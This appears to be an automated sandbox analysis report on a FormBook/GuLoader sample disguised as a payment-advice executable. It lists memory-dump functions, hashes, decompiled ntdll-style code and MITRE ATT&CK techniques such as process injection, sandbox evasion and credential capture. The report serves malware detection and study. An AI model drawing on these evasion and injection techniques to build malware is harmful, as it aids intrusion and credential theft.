Opcode Fuzzy Hash: 481f9fd79001dff5ad067413d368ef1eab9acbc1022293b595b65c1563509530
Instruction Fuzzy Hash: CD900265211045030106E9590705507004AD7D6391751C031F5005554CD76188A16161

Uniqueness

Uniqueness Score: -1.00%

Function 036495D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 036495DA

Memory Dump Source

Source File: 00000013.00000002.496085095.00000000035E0000.00000040.00000001.sdmp, Offset: 035E0000, based on PE: true

Associated: 00000013.00000002.496592097.00000000036FB000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.496605344.00000000036FF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3f8f3c7f2097e4996748f106e5c558af122cfe8e0759129eecab06ee9955dd62
Instruction ID: 254323890086e49822024506a4867c58b2e6ba2896d715fd271f875be493f9c2
Opcode Fuzzy Hash: 3f8f3c7f2097e4996748f106e5c558af122cfe8e0759129eecab06ee9955dd62
Instruction Fuzzy Hash: 859002A1202045034106B5594415616400ED7E1241F51C031F5004594DC66588D17165

Uniqueness

Uniqueness Score: -1.00%

Function 02DE84B2, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02DD3B93), ref: 02DE84ED

Strings

.z`, xrefs: 02DE84DC, 02DE84E8

Memory Dump Source

Source File: 00000013.00000002.495160513.0000000002DD0000.00000040.00000001.sdmp, Offset: 02DD0000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: e6ff05404e8d1e558fd0099c31b283271dcdfcc9801a6d34b87338d4c06a3069
Instruction ID: 795ff555e36ef6bc30b6a3c1b808ee4ca84a5a26db661ee1b2265c4dbea82e37
Opcode Fuzzy Hash: e6ff05404e8d1e558fd0099c31b283271dcdfcc9801a6d34b87338d4c06a3069
Instruction Fuzzy Hash: A70192B5600214BFEB24DF64CC84EDB7769EF45390F018599F90D9B351C631E901CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02DE84C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02DD3B93), ref: 02DE84ED

Strings

.z`, xrefs: 02DE84DC, 02DE84E8

Memory Dump Source

Source File: 00000013.00000002.495160513.0000000002DD0000.00000040.00000001.sdmp, Offset: 02DD0000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: 57c64bb14a032f91a035bf0e0709f007cd06ef6ae899ef39b8fde682cd94f9de
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: F6E01AB12002086BDB14EF59CC44EA777ADEF88750F014554BA0957351C630E9108AF0

Uniqueness

Uniqueness Score: -1.00%

Function 02DE852D, Relevance: 1.6, APIs: 1, Instructions: 52processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02DE8584

Memory Dump Source

Source File: 00000013.00000002.495160513.0000000002DD0000.00000040.00000001.sdmp, Offset: 02DD0000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: f328e902bfe709853aff304d69953de34c6a9625c348b29e73ab808f590c86af
Instruction ID: 9c258532a94144fae869b1cc9ec765570006d59c64ca1c171ce5ef21210efe97
Opcode Fuzzy Hash: f328e902bfe709853aff304d69953de34c6a9625c348b29e73ab808f590c86af
Instruction Fuzzy Hash: A60117B2205248ABCB04DF98CC81DEB3BADEF9D750F158248FA4A97241C630F801CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 02DD9B10, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02DD9B82

Memory Dump Source

Source File: 00000013.00000002.495160513.0000000002DD0000.00000040.00000001.sdmp, Offset: 02DD0000, based on PE: false

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction ID: 56c8d24dc8fe6d1212362e0487680758f977548f9acbbe5c762b363c428f9d86
Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction Fuzzy Hash: EB011EB5E4020EABDF10EBE4DC91FDDB7799B54308F008295E90997240F631EB14CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02DE8530, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02DE8584

Memory Dump Source

Source File: 00000013.00000002.495160513.0000000002DD0000.00000040.00000001.sdmp, Offset: 02DD0000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: 5b3fca624ab4341511d00ae5a9ae1d98feaf42a4976a5155a126d0e7fa486daa
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: 24015FB2214108AFCB54DF89DC80EEB77ADAF8C754F158258BA0D97251D630EC51CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02DE8611, Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,02DDCF92,02DDCF92,?,00000000,?,?), ref: 02DE8650

Memory Dump Source

Source File: 00000013.00000002.495160513.0000000002DD0000.00000040.00000001.sdmp, Offset: 02DD0000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 5c9ab61564954aeed5a0ac8a65bbf3e930f469b6be633185c36ec42895cf39cb
Instruction ID: ba820bfc17f2b7ed80d1a410ef50ff907a283e7c17bb5a92edf3d9f3b424c45c
Opcode Fuzzy Hash: 5c9ab61564954aeed5a0ac8a65bbf3e930f469b6be633185c36ec42895cf39cb
Instruction Fuzzy Hash: 7EF0A0B26002086BDB20DF64CC45FDF3799EF45220F008159FA496B291C535A9028BA0

Uniqueness

Uniqueness Score: -1.00%

Function 02DE8620, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,02DDCF92,02DDCF92,?,00000000,?,?), ref: 02DE8650

Memory Dump Source

Source File: 00000013.00000002.495160513.0000000002DD0000.00000040.00000001.sdmp, Offset: 02DD0000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 7bf1331b47759bf62ae9707bb25f6d465c78627ef07b9a9767e69265340b0bdb
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: 73E01AB12002086BDB20EF49CC84EEB37ADEF88650F018154BA0957341C930E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0364967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03649694

Memory Dump Source

Source File: 00000013.00000002.496085095.00000000035E0000.00000040.00000001.sdmp, Offset: 035E0000, based on PE: true

Associated: 00000013.00000002.496592097.00000000036FB000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.496605344.00000000036FF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b64eca594efc4802b44a65cb989bd4490952e1af19f6a71828033cccc5adb38a
Instruction ID: 91b6aaf6da87b44be7afe8883a1fb024b1d68ac7dfcad43194315ddb2254d8cd
Opcode Fuzzy Hash: b64eca594efc4802b44a65cb989bd4490952e1af19f6a71828033cccc5adb38a
Instruction Fuzzy Hash: 62B09B71D424C5C6E715D76047087177944B7D1741F16C065E1020655A4778C0D1F5B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 036040FD, Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E036040FD(void* __ecx) {
				signed int _v8;
				char _v548;
				unsigned int _v552;
				unsigned int _v556;
				unsigned int _v560;
				char _v564;
				char _v568;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t49;
				signed char _t53;
				unsigned int _t55;
				unsigned int _t56;
				unsigned int _t65;
				unsigned int _t66;
				void* _t68;
				unsigned int _t73;
				unsigned int _t77;
				unsigned int _t85;
				char* _t98;
				unsigned int _t102;
				signed int _t103;
				void* _t105;
				signed int _t107;
				void* _t108;
				void* _t110;
				void* _t111;
				void* _t112;

				_t45 =  *0x36fd360 ^ _t107;
				_v8 =  *0x36fd360 ^ _t107;
				_t105 = __ecx;
				if( *0x36f84d4 == 0) {
					L5:
					return E0364B640(_t45, _t85, _v8 ^ _t107, _t102, _t105, _t106);
				}
				_t85 = 0;
				E0361E9C0(3,  *((intOrPtr*)(__ecx + 0x18)), 0, 0,  &_v564);
				if(( *0x7ffe02d5 & 0x00000003) == 0) {
					_t45 = 0;
				} else {
					_t45 =  *(_v564 + 0x5f) & 0x00000001;
				}
				if(_t45 == 0) {
					_v552 = _t85;
					_t49 = E036042EB(_t105);
					__eflags = _t49;
					if(_t49 != 0) {
						L15:
						_t103 = 2;
						_v552 = _t103;
						L10:
						__eflags = ( *0x7ffe02d5 & 0x0000000c) - 4;
						if(( *0x7ffe02d5 & 0x0000000c) == 4) {
							_t45 = 1;
						} else {
							_t53 = E036041EA(_v564);
							asm("sbb al, al");
							_t45 =  ~_t53 + 1;
							__eflags = _t45;
						}
						__eflags = _t45;
						if(_t45 == 0) {
							_t102 = _t103 | 0x00000040;
							_v552 = _t102;
						}
						__eflags = _t102;
						if(_t102 != 0) {
							L33:
							_push(4);
							_push( &_v552);
							_push(0x22);
							_push(0xffffffff);
							_t45 = E036496C0();
						}
						goto L4;
					}
					_v556 = _t85;
					_t102 =  &_v556;
					_t55 = E0360429E(_t105 + 0x2c, _t102);
					__eflags = _t55;
					if(_t55 >= 0) {
						__eflags = _v556 - _t85;
						if(_v556 == _t85) {
							goto L8;
						}
						_t85 = _t105 + 0x24;
						E03695720(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v556);
						_v560 = 0x214;
						E0364FA60( &_v548, 0, 0x214);
						_t106 =  *0x36f84d4;
						_t110 = _t108 + 0x20;
						 *0x36fb1e0( *((intOrPtr*)(_t105 + 0x28)),  *((intOrPtr*)(_t105 + 0x18)),  *((intOrPtr*)(_t105 + 0x20)), L"ExecuteOptions",  &_v568,  &_v548,  &_v560, _t85);
						_t65 =  *((intOrPtr*)( *0x36f84d4))();
						__eflags = _t65;
						if(_t65 == 0) {
							goto L8;
						}
						_t66 = _v560;
						__eflags = _t66;
						if(_t66 == 0) {
							goto L8;
						}
						__eflags = _t66 - 0x214;
						if(_t66 >= 0x214) {
							goto L8;
						}
						_t68 = (_t66 >> 1) * 2 - 2;
						__eflags = _t68 - 0x214;
						if(_t68 >= 0x214) {
							E0364B75A();
							goto L33;
						}
						_push(_t85);
						 *((short*)(_t107 + _t68 - 0x220)) = 0;
						E03695720(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v548);
						_t111 = _t110 + 0x14;
						_t73 = E03651480( &_v548, L"Execute=1");
						_push(_t85);
						__eflags = _t73;
						if(_t73 == 0) {
							E03695720(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v548);
							_t106 =  &_v548;
							_t98 =  &_v548;
							_t112 = _t111 + 0x14;
							_t77 = _v560 + _t98;
							_v556 = _t77;
							__eflags = _t98 - _t77;
							if(_t98 >= _t77) {
								goto L8;
							} else {
								goto L27;
							}
							do {
								L27:
								_t85 = E03651150(_t106, 0x20);
								__eflags = _t85;
								if(__eflags != 0) {
									__eflags = 0;
									 *_t85 = 0;
								}
								E03695720(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t106);
								_t112 = _t112 + 0x10;
								E03683E13(_t105, _t106, __eflags);
								__eflags = _t85;
								if(_t85 == 0) {
									goto L8;
								}
								_t41 = _t85 + 2; // 0x2
								_t106 = _t41;
								__eflags = _t106 - _v556;
							} while (_t106 < _v556);
							goto L8;
						}
						_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
						_push(3);
						_push(0x55);
						E03695720();
						goto L15;
					}
					L8:
					_t56 = E036041F7(_t105);
					__eflags = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					_t103 = _v552;
					goto L10;
				} else {
					L4:
					 *(_t105 + 0x34) =  *(_t105 + 0x34) | 0x80000000;
					goto L5;
				}
			}

0x0360410d
0x0360410f
0x0360411c
0x0360411e
0x03604158
0x03604168
0x03604168
0x03604126
0x03604130
0x0360413c
0x036604a2
0x03604142
0x0360414b
0x0360414b
0x0360414f
0x0360416b
0x03604171
0x03604176
0x03604178
0x036041d0
0x036041d2
0x036041d3
0x036041a7
0x036041ae
0x036041b0
0x036041db
0x036041b2
0x036041b8
0x036041bf
0x036041c1
0x036041c1
0x036041c1
0x036041c3
0x036041c5
0x036041df
0x036041e2
0x036041e2
0x036041c7
0x036041c9
0x03660628
0x03660628
0x03660630
0x03660631
0x03660633
0x03660635
0x03660635
0x00000000
0x036041c9
0x0360417d
0x03604183
0x03604189
0x0360418e
0x03604190
0x036604a9
0x036604af
0x00000000
0x00000000
0x036604b5
0x036604c8
0x036604d5
0x036604e5
0x036604ea
0x036604f6
0x03660518
0x0366051e
0x03660520
0x03660522
0x00000000
0x00000000
0x03660528
0x0366052e
0x03660530
0x00000000
0x00000000
0x0366053b
0x0366053d
0x00000000
0x00000000
0x03660545
0x0366054c
0x0366054e
0x03660623
0x00000000
0x03660623
0x03660556
0x03660557
0x0366056f
0x03660574
0x03660583
0x0366058a
0x0366058b
0x0366058d
0x036605b5
0x036605c0
0x036605c6
0x036605c8
0x036605cb
0x036605cd
0x036605d3
0x036605d5
0x00000000
0x00000000
0x00000000
0x00000000
0x036605db
0x036605db
0x036605e3
0x036605e7
0x036605e9
0x036605eb
0x036605ed
0x036605ed
0x036605fa
0x036605ff
0x03660606
0x0366060b
0x0366060d
0x00000000
0x00000000
0x03660613
0x03660613
0x03660616
0x03660616
0x00000000
0x0366061e
0x0366058f
0x03660594
0x03660596
0x03660598
0x00000000
0x0366059d
0x03604196
0x03604198
0x0360419d
0x0360419f
0x00000000
0x00000000
0x036041a1
0x00000000
0x03604151
0x03604151
0x03604151
0x00000000
0x03604151

Strings

ExecuteOptions, xrefs: 0366050A
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 036605AC
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 0366058F
Execute=1, xrefs: 0366057D
CLIENT(ntdll): Processing section info %ws..., xrefs: 036605F1
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 036604BF
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 03660566

Memory Dump Source

Source File: 00000013.00000002.496085095.00000000035E0000.00000040.00000001.sdmp, Offset: 035E0000, based on PE: true

Associated: 00000013.00000002.496592097.00000000036FB000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.496605344.00000000036FF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: f1626c2f74fcc7c322dca45d5e23f2c771bf043e80800d9f5fd1cd6b7ea22842
Instruction ID: 3e84dfc787408b0736b7d9ba81af78287d8c47007b56d45146014e840e2e040f
Opcode Fuzzy Hash: f1626c2f74fcc7c322dca45d5e23f2c771bf043e80800d9f5fd1cd6b7ea22842
Instruction Fuzzy Hash: E761F875A00319BAEF25EA56ED86FBB77ACEF14300F0400E9D6159B2C1DA709E418F64

Uniqueness

Uniqueness Score: -1.00%

Function 0369FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0369FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0364CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E03695720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E03695720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x0369fdda
0x0369fde2
0x0369fde5
0x0369fdec
0x0369fdfa
0x0369fdff
0x0369fe0a
0x0369fe0f
0x0369fe17
0x0369fe1e
0x0369fe19
0x0369fe19
0x0369fe19
0x0369fe20
0x0369fe21
0x0369fe22
0x0369fe25
0x0369fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0369FDFA

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0369FE01
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0369FE2B

Memory Dump Source

Source File: 00000013.00000002.496085095.00000000035E0000.00000040.00000001.sdmp, Offset: 035E0000, based on PE: true

Associated: 00000013.00000002.496592097.00000000036FB000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.496605344.00000000036FF000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: bac52fcc41a99cfc6c56c74ce0599623f4da64e81372d64d9694c198f9204d63
Instruction ID: 6de3774aaa2e6cae22e96bb9e9bad877c4aff89db98294d0a5b55f7e8832203e
Opcode Fuzzy Hash: bac52fcc41a99cfc6c56c74ce0599623f4da64e81372d64d9694c198f9204d63
Instruction Fuzzy Hash: 02F0F676640201BFEA219A45DC06F23BB5EEB45730F150319F7289E1E1DA62F92187F4

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report payment advice_mt103645367.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: FormBook

Threatname: GuLoader

Yara Overview

Memory Dumps

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTPS Packets

Function 00414264, Relevance: 894.4, APIs: 467, Strings: 42, Instructions: 3662
COMMON

Function 00418566, Relevance: 116.0, APIs: 60, Strings: 6, Instructions: 518
COMMON

Function 004017E8, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 286
COMMON

Function 004213CA, Relevance: 103.7, APIs: 56, Strings: 3, Instructions: 459
COMMON

Function 0041FC9F, Relevance: 80.9, APIs: 44, Strings: 2, Instructions: 374
COMMON

Function 00420D70, Relevance: 66.4, APIs: 44, Instructions: 415
COMMON

Function 00418E4F, Relevance: 52.8, APIs: 35, Instructions: 272
COMMON

Function 0041FB17, Relevance: 18.1, APIs: 12, Instructions: 98
COMMON

Function 00420306, Relevance: 13.6, APIs: 9, Instructions: 110
COMMON

Function 0041FA3F, Relevance: 7.6, APIs: 5, Instructions: 57
COMMON